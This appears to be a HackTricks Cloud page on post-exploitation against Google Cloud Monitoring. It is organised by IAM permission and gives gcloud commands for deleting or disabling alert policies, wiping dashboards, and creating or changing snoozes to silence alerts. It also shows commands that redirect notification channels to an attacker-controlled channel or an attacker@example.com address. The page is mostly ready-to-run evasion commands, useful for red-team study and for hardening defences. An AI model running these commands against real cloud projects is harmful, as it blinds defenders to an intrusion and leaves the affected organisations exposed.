5.4 KiB
GCP - Monitoring Post Exploitation
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Monitoring
Fore more information check:
{% content-ref url="../gcp-services/gcp-monitoring-enum.md" %} gcp-monitoring-enum.md {% endcontent-ref %}
For other ways to disrupt logs check:
{% content-ref url="gcp-logging-post-exploitation.md" %} gcp-logging-post-exploitation.md {% endcontent-ref %}
monitoring.alertPolicies.delete
Delete an alert policy:
gcloud alpha monitoring policies delete <policy>
monitoring.alertPolicies.update
Disrupt an alert policy:
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled
# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels
# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL
# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>
monitoring.dashboards.update
Modify a dashboard to disrupt it:
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''
monitoring.dashboards.delete
Delete a dashboard:
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
monitoring.snoozes.create
Prevent policies from generating alerts by creating a snoozer:
{% code overflow="wrap" %}
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"
{% endcode %}
monitoring.snoozes.update
Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:
{% code overflow="wrap" %}
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME
# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
{% endcode %}
monitoring.notificationChannels.delete
Delete a configured channel:
# Delete channel
gcloud alpha monitoring channels delete <channel>
monitoring.notificationChannels.update
Update labels of a channel to disrupt it:
{% code overflow="wrap" %}
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
{% endcode %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.